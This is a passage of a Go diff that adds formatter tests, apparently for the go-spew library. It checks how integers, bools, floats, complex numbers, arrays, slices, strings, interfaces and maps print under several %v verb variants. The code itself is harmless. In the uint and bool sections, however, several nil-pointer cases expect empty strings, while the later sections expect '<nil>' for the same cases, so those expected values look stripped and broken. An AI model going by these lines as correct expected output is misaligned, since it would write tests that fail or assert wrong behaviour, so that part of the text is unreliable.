+ pv4Addr := fmt.Sprintf("%p", &pv4)
+ v4t := "uint64"
+ v4s := "18446744073709551615"
+ addFormatterTest("%v", v4, v4s)
+ addFormatterTest("%v", pv4, "<*>"+v4s)
+ addFormatterTest("%v", &pv4, "<**>"+v4s)
+ addFormatterTest("%v", nv4, "")
+ addFormatterTest("%+v", v4, v4s)
+ addFormatterTest("%+v", pv4, "<*>("+v4Addr+")"+v4s)
+ addFormatterTest("%+v", &pv4, "<**>("+pv4Addr+"->"+v4Addr+")"+v4s)
+ addFormatterTest("%+v", nv4, "")
+ addFormatterTest("%#v", v4, "("+v4t+")"+v4s)
+ addFormatterTest("%#v", pv4, "(*"+v4t+")"+v4s)
+ addFormatterTest("%#v", &pv4, "(**"+v4t+")"+v4s)
+ addFormatterTest("%#v", nv4, "(*"+v4t+")"+"")
+ addFormatterTest("%#+v", v4, "("+v4t+")"+v4s)
+ addFormatterTest("%#+v", pv4, "(*"+v4t+")("+v4Addr+")"+v4s)
+ addFormatterTest("%#+v", &pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")"+v4s)
+ addFormatterTest("%#+v", nv4, "(*"+v4t+")"+"")
+
+ // Max uint.
+ v5 := uint(4294967295)
+ nv5 := (*uint)(nil)
+ pv5 := &v5
+ v5Addr := fmt.Sprintf("%p", pv5)
+ pv5Addr := fmt.Sprintf("%p", &pv5)
+ v5t := "uint"
+ v5s := "4294967295"
+ addFormatterTest("%v", v5, v5s)
+ addFormatterTest("%v", pv5, "<*>"+v5s)
+ addFormatterTest("%v", &pv5, "<**>"+v5s)
+ addFormatterTest("%v", nv5, "")
+ addFormatterTest("%+v", v5, v5s)
+ addFormatterTest("%+v", pv5, "<*>("+v5Addr+")"+v5s)
+ addFormatterTest("%+v", &pv5, "<**>("+pv5Addr+"->"+v5Addr+")"+v5s)
+ addFormatterTest("%+v", nv5, "")
+ addFormatterTest("%#v", v5, "("+v5t+")"+v5s)
+ addFormatterTest("%#v", pv5, "(*"+v5t+")"+v5s)
+ addFormatterTest("%#v", &pv5, "(**"+v5t+")"+v5s)
+ addFormatterTest("%#v", nv5, "(*"+v5t+")"+"")
+ addFormatterTest("%#+v", v5, "("+v5t+")"+v5s)
+ addFormatterTest("%#+v", pv5, "(*"+v5t+")("+v5Addr+")"+v5s)
+ addFormatterTest("%#+v", &pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")"+v5s)
+ addFormatterTest("%#v", nv5, "(*"+v5t+")"+"")
+}
+
+func addBoolFormatterTests() {
+ // Boolean true.
+ v := bool(true)
+ nv := (*bool)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "bool"
+ vs := "true"
+ addFormatterTest("%v", v, vs)
+ addFormatterTest("%v", pv, "<*>"+vs)
+ addFormatterTest("%v", &pv, "<**>"+vs)
+ addFormatterTest("%v", nv, "")
+ addFormatterTest("%+v", v, vs)
+ addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+ addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%+v", nv, "")
+ addFormatterTest("%#v", v, "("+vt+")"+vs)
+ addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+ addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+ addFormatterTest("%#v", nv, "(*"+vt+")"+"")
+ addFormatterTest("%#+v", v, "("+vt+")"+vs)
+ addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+ addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%#+v", nv, "(*"+vt+")"+"")
+
+ // Boolean false.
+ v2 := bool(false)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "bool"
+ v2s := "false"
+ addFormatterTest("%v", v2, v2s)
+ addFormatterTest("%v", pv2, "<*>"+v2s)
+ addFormatterTest("%v", &pv2, "<**>"+v2s)
+ addFormatterTest("%+v", v2, v2s)
+ addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+ addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+ addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+ addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+}
+
+func addFloatFormatterTests() {
+ // Standard float32.
+ v := float32(3.1415)
+ nv := (*float32)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "float32"
+ vs := "3.1415"
+ addFormatterTest("%v", v, vs)
+ addFormatterTest("%v", pv, "<*>"+vs)
+ addFormatterTest("%v", &pv, "<**>"+vs)
+ addFormatterTest("%v", nv, "")
+ addFormatterTest("%+v", v, vs)
+ addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+ addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%+v", nv, "")
+ addFormatterTest("%#v", v, "("+vt+")"+vs)
+ addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+ addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+ addFormatterTest("%#v", nv, "(*"+vt+")"+"")
+ addFormatterTest("%#+v", v, "("+vt+")"+vs)
+ addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+ addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+
+ // Standard float64.
+ v2 := float64(3.1415926)
+ nv2 := (*float64)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "float64"
+ v2s := "3.1415926"
+ addFormatterTest("%v", v2, v2s)
+ addFormatterTest("%v", pv2, "<*>"+v2s)
+ addFormatterTest("%v", &pv2, "<**>"+v2s)
+ addFormatterTest("%+v", nv2, "<nil>")
+ addFormatterTest("%+v", v2, v2s)
+ addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+ addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%+v", nv2, "<nil>")
+ addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+ addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+ addFormatterTest("%#v", nv2, "(*"+v2t+")"+"<nil>")
+ addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"<nil>")
+}
+
+func addComplexFormatterTests() {
+ // Standard complex64.
+ v := complex(float32(6), -2)
+ nv := (*complex64)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "complex64"
+ vs := "(6-2i)"
+ addFormatterTest("%v", v, vs)
+ addFormatterTest("%v", pv, "<*>"+vs)
+ addFormatterTest("%v", &pv, "<**>"+vs)
+ addFormatterTest("%+v", nv, "<nil>")
+ addFormatterTest("%+v", v, vs)
+ addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+ addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%+v", nv, "<nil>")
+ addFormatterTest("%#v", v, "("+vt+")"+vs)
+ addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+ addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+ addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+ addFormatterTest("%#+v", v, "("+vt+")"+vs)
+ addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+ addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+
+ // Standard complex128.
+ v2 := complex(float64(-6), 2)
+ nv2 := (*complex128)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "complex128"
+ v2s := "(-6+2i)"
+ addFormatterTest("%v", v2, v2s)
+ addFormatterTest("%v", pv2, "<*>"+v2s)
+ addFormatterTest("%v", &pv2, "<**>"+v2s)
+ addFormatterTest("%+v", nv2, "<nil>")
+ addFormatterTest("%+v", v2, v2s)
+ addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+ addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%+v", nv2, "<nil>")
+ addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+ addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+ addFormatterTest("%#v", nv2, "(*"+v2t+")"+"<nil>")
+ addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"<nil>")
+}
+
+func addArrayFormatterTests() {
+ // Array containing standard ints.
+ v := [3]int{1, 2, 3}
+ nv := (*[3]int)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "[3]int"
+ vs := "[1 2 3]"
+ addFormatterTest("%v", v, vs)
+ addFormatterTest("%v", pv, "<*>"+vs)
+ addFormatterTest("%v", &pv, "<**>"+vs)
+ addFormatterTest("%+v", nv, "<nil>")
+ addFormatterTest("%+v", v, vs)
+ addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+ addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%+v", nv, "<nil>")
+ addFormatterTest("%#v", v, "("+vt+")"+vs)
+ addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+ addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+ addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+ addFormatterTest("%#+v", v, "("+vt+")"+vs)
+ addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+ addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+
+ // Array containing type with custom formatter on pointer receiver only.
+ v2 := [3]pstringer{"1", "2", "3"}
+ nv2 := (*[3]pstringer)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "[3]spew_test.pstringer"
+ v2sp := "[stringer 1 stringer 2 stringer 3]"
+ v2s := v2sp
+ if spew.UnsafeDisabled {
+ v2s = "[1 2 3]"
+ }
+ addFormatterTest("%v", v2, v2s)
+ addFormatterTest("%v", pv2, "<*>"+v2sp)
+ addFormatterTest("%v", &pv2, "<**>"+v2sp)
+ addFormatterTest("%+v", nv2, "<nil>")
+ addFormatterTest("%+v", v2, v2s)
+ addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2sp)
+ addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2sp)
+ addFormatterTest("%+v", nv2, "<nil>")
+ addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2sp)
+ addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2sp)
+ addFormatterTest("%#v", nv2, "(*"+v2t+")"+"<nil>")
+ addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2sp)
+ addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2sp)
+ addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"<nil>")
+
+ // Array containing interfaces.
+ v3 := [3]interface{}{"one", int(2), uint(3)}
+ nv3 := (*[3]interface{})(nil)
+ pv3 := &v3
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "[3]interface {}"
+ v3t2 := "string"
+ v3t3 := "int"
+ v3t4 := "uint"
+ v3s := "[one 2 3]"
+ v3s2 := "[(" + v3t2 + ")one (" + v3t3 + ")2 (" + v3t4 + ")3]"
+ addFormatterTest("%v", v3, v3s)
+ addFormatterTest("%v", pv3, "<*>"+v3s)
+ addFormatterTest("%v", &pv3, "<**>"+v3s)
+ addFormatterTest("%+v", nv3, "<nil>")
+ addFormatterTest("%+v", v3, v3s)
+ addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s)
+ addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s)
+ addFormatterTest("%+v", nv3, "<nil>")
+ addFormatterTest("%#v", v3, "("+v3t+")"+v3s2)
+ addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s2)
+ addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s2)
+ addFormatterTest("%#v", nv3, "(*"+v3t+")"+"<nil>")
+ addFormatterTest("%#+v", v3, "("+v3t+")"+v3s2)
+ addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s2)
+ addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s2)
+ addFormatterTest("%#+v", nv3, "(*"+v3t+")"+"<nil>")
+}
+
+func addSliceFormatterTests() {
+ // Slice containing standard float32 values.
+ v := []float32{3.14, 6.28, 12.56}
+ nv := (*[]float32)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "[]float32"
+ vs := "[3.14 6.28 12.56]"
+ addFormatterTest("%v", v, vs)
+ addFormatterTest("%v", pv, "<*>"+vs)
+ addFormatterTest("%v", &pv, "<**>"+vs)
+ addFormatterTest("%+v", nv, "<nil>")
+ addFormatterTest("%+v", v, vs)
+ addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+ addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%+v", nv, "<nil>")
+ addFormatterTest("%#v", v, "("+vt+")"+vs)
+ addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+ addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+ addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+ addFormatterTest("%#+v", v, "("+vt+")"+vs)
+ addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+ addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+
+ // Slice containing type with custom formatter on pointer receiver only.
+ v2 := []pstringer{"1", "2", "3"}
+ nv2 := (*[]pstringer)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "[]spew_test.pstringer"
+ v2s := "[stringer 1 stringer 2 stringer 3]"
+ addFormatterTest("%v", v2, v2s)
+ addFormatterTest("%v", pv2, "<*>"+v2s)
+ addFormatterTest("%v", &pv2, "<**>"+v2s)
+ addFormatterTest("%+v", nv2, "<nil>")
+ addFormatterTest("%+v", v2, v2s)
+ addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+ addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%+v", nv2, "<nil>")
+ addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+ addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+ addFormatterTest("%#v", nv2, "(*"+v2t+")"+"<nil>")
+ addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"<nil>")
+
+ // Slice containing interfaces.
+ v3 := []interface{}{"one", int(2), uint(3), nil}
+ nv3 := (*[]interface{})(nil)
+ pv3 := &v3
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "[]interface {}"
+ v3t2 := "string"
+ v3t3 := "int"
+ v3t4 := "uint"
+ v3t5 := "interface {}"
+ v3s := "[one 2 3 <nil>]"
+ v3s2 := "[(" + v3t2 + ")one (" + v3t3 + ")2 (" + v3t4 + ")3 (" + v3t5 +
+ ")<nil>]"
+ addFormatterTest("%v", v3, v3s)
+ addFormatterTest("%v", pv3, "<*>"+v3s)
+ addFormatterTest("%v", &pv3, "<**>"+v3s)
+ addFormatterTest("%+v", nv3, "<nil>")
+ addFormatterTest("%+v", v3, v3s)
+ addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s)
+ addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s)
+ addFormatterTest("%+v", nv3, "<nil>")
+ addFormatterTest("%#v", v3, "("+v3t+")"+v3s2)
+ addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s2)
+ addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s2)
+ addFormatterTest("%#v", nv3, "(*"+v3t+")"+"<nil>")
+ addFormatterTest("%#+v", v3, "("+v3t+")"+v3s2)
+ addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s2)
+ addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s2)
+ addFormatterTest("%#+v", nv3, "(*"+v3t+")"+"<nil>")
+
+ // Nil slice.
+ var v4 []int
+ nv4 := (*[]int)(nil)
+ pv4 := &v4
+ v4Addr := fmt.Sprintf("%p", pv4)
+ pv4Addr := fmt.Sprintf("%p", &pv4)
+ v4t := "[]int"
+ v4s := "<nil>"
+ addFormatterTest("%v", v4, v4s)
+ addFormatterTest("%v", pv4, "<*>"+v4s)
+ addFormatterTest("%v", &pv4, "<**>"+v4s)
+ addFormatterTest("%+v", nv4, "<nil>")
+ addFormatterTest("%+v", v4, v4s)
+ addFormatterTest("%+v", pv4, "<*>("+v4Addr+")"+v4s)
+ addFormatterTest("%+v", &pv4, "<**>("+pv4Addr+"->"+v4Addr+")"+v4s)
+ addFormatterTest("%+v", nv4, "<nil>")
+ addFormatterTest("%#v", v4, "("+v4t+")"+v4s)
+ addFormatterTest("%#v", pv4, "(*"+v4t+")"+v4s)
+ addFormatterTest("%#v", &pv4, "(**"+v4t+")"+v4s)
+ addFormatterTest("%#v", nv4, "(*"+v4t+")"+"<nil>")
+ addFormatterTest("%#+v", v4, "("+v4t+")"+v4s)
+ addFormatterTest("%#+v", pv4, "(*"+v4t+")("+v4Addr+")"+v4s)
+ addFormatterTest("%#+v", &pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")"+v4s)
+ addFormatterTest("%#+v", nv4, "(*"+v4t+")"+"<nil>")
+}
+
+func addStringFormatterTests() {
+ // Standard string.
+ v := "test"
+ nv := (*string)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "string"
+ vs := "test"
+ addFormatterTest("%v", v, vs)
+ addFormatterTest("%v", pv, "<*>"+vs)
+ addFormatterTest("%v", &pv, "<**>"+vs)
+ addFormatterTest("%+v", nv, "<nil>")
+ addFormatterTest("%+v", v, vs)
+ addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+ addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%+v", nv, "<nil>")
+ addFormatterTest("%#v", v, "("+vt+")"+vs)
+ addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+ addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+ addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+ addFormatterTest("%#+v", v, "("+vt+")"+vs)
+ addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+ addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+}
+
+func addInterfaceFormatterTests() {
+ // Nil interface.
+ var v interface{}
+ nv := (*interface{})(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "interface {}"
+ vs := "<nil>"
+ addFormatterTest("%v", v, vs)
+ addFormatterTest("%v", pv, "<*>"+vs)
+ addFormatterTest("%v", &pv, "<**>"+vs)
+ addFormatterTest("%+v", nv, "<nil>")
+ addFormatterTest("%+v", v, vs)
+ addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+ addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%+v", nv, "<nil>")
+ addFormatterTest("%#v", v, "("+vt+")"+vs)
+ addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+ addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+ addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+ addFormatterTest("%#+v", v, "("+vt+")"+vs)
+ addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+ addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+
+ // Sub-interface.
+ v2 := interface{}(uint16(65535))
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "uint16"
+ v2s := "65535"
+ addFormatterTest("%v", v2, v2s)
+ addFormatterTest("%v", pv2, "<*>"+v2s)
+ addFormatterTest("%v", &pv2, "<**>"+v2s)
+ addFormatterTest("%+v", v2, v2s)
+ addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+ addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+ addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+ addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+}
+
+func addMapFormatterTests() {
+ // Map with string keys and int vals.
+ v := map[string]int{"one": 1, "two": 2}
+ nilMap := map[string]int(nil)
+ nv := (*map[string]int)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "map[string]int"
+ vs := "map[one:1 two:2]"
+ vs2 := "map[two:2 one:1]"
+ addFormatterTest("%v", v, vs, vs2)
+ addFormatterTest("%v", pv, "<*>"+vs, "<*>"+vs2)
+ addFormatterTest("%v", &pv, "<**>"+vs, "<**>"+vs2)
+ addFormatterTest("%+v", nilMap, "<nil>")
+ addFormatterTest("%+v", nv, "<nil>")
+ addFormatterTest("%+v", v, vs, vs2)
+ addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs, "<*>("+vAddr+")"+vs2)
+ addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs,
+ "<**>("+pvAddr+"->"+vAddr+")"+vs2)
+ addFormatterTest("%+v", nilMap, "<nil>")
+ addFormatterTest("%+v", nv, "<nil>")
+ addFormatterTest("%#v", v, "("+vt+")"+vs, "("+vt+")"+vs2)
+ addFormatterTest("%#v", pv, "(*"+vt+")"+vs, "(*"+vt+")"+vs2)
+ addFormatterTest("%#v", &pv, "(**"+vt+")"+vs, "(**"+vt+")"+vs2)
+ addFormatterTest("%#v", nilMap, "("+vt+")"+"<nil>")
+ addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+ addFormatterTest("%#+v", v, "("+vt+")"+vs, "("+vt+")"+vs2)
+ addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs,
+ "(*"+vt+")("+vAddr+")"+vs2)
+ addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs,
+ "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs2)
+ addFormatterTest("%#+v", nilMap, "("+vt+")"+"<nil>")
+ addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+
+ // Map with custom formatter type on pointer receiver only keys and vals.
+ v2 := map[pstringer]pstringer{"one": "1"}
+ nv2 := (*map[pstringer]pstringer)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "map[spew_test.pstringer]spew_test.pstringer"
+ v2s := "map[stringer one:stringer 1]"
+ if spew.UnsafeDisabled {
+ v2s = "map[one:1]"
+ }
+ addFormatterTest("%v", v2, v2s)
+ addFormatterTest("%v", pv2, "<*>"+v2s)
+ addFormatterTest("%v", &pv2, "<**>"+v2s)
+ addFormatterTest("%+v", nv2, "<nil>")
+ addFormatterTest("%+v", v2, v2s)
+ addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+ addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%+v", nv2, "<nil>")
+ addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+ addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+ addFormatterTest("%#v", nv2, "(*"+v2t+")"+"<nil>")
+ addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"<nil>")
+
+ // Map with interface keys and values.
+ v3 := map[interface{}]interface{}{"one": 1}
+ nv3 := (*map[interface{}]interface{})(nil)
+ pv3 := &v3
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "map[interface {}]interface {}"
+ v3t1 := "string"
+ v3t2 := "int"
+ v3s := "map[one:1]"
+ v3s2 := "map[(" + v3t1 + ")one:(" + v3t2 + ")1]"
+ addFormatterTest("%v", v3, v3s)
+ addFormatterTest("%v", pv3, "<*>"+v3s)
+ addFormatterTest("%v", &pv3, "<**>"+v3s)
+ addFormatterTest("%+v", nv3, "<nil>")
+ addFormatterTest("%+v", v3, v3s)
+ addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s)
+ addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s)
+ addFormatterTest("%+v", nv3, "<nil>")
+ addFormatterTest("%#v", v3, "("+v3t+")"+v3s2)
+ addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s2)
+ addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s2)
+ addFormatterTest("%#v", nv3, "(*"+v3t+")"+"<nil>")
+ addFormatterTest("%#+v", v3, "("+v3t+")"+v3s2)
+ addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s2)
+ addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s2)
+ addFormatterTest("%#+v", nv3, "(*"+v3t+")"+"<nil>")
+
+ // Map with nil interface value
+ v4 := map[string]interface{}{"nil": nil}
+ nv4 := (*map[string]interface{})(nil)
+ pv4 := &v4
+ v4Addr := fmt.Sprintf("%p", pv4)
+ pv4Addr := fmt.Sprintf("%p", &pv4)
+ v4t := "map[string]interface {}"
+ v4t1 := "interface {}"
+ v4s := "map[nil:<nil>]"
+ v4s2 := "map[nil:(" + v4t1 + ")<nil>]"
+ addFormatterTest("%v", v4, v4s)
+ addFormatterTest("%v", pv4, "<*>"+v4s)
+ addFormatterTest("%v", &pv4, "<**>"+v4s)
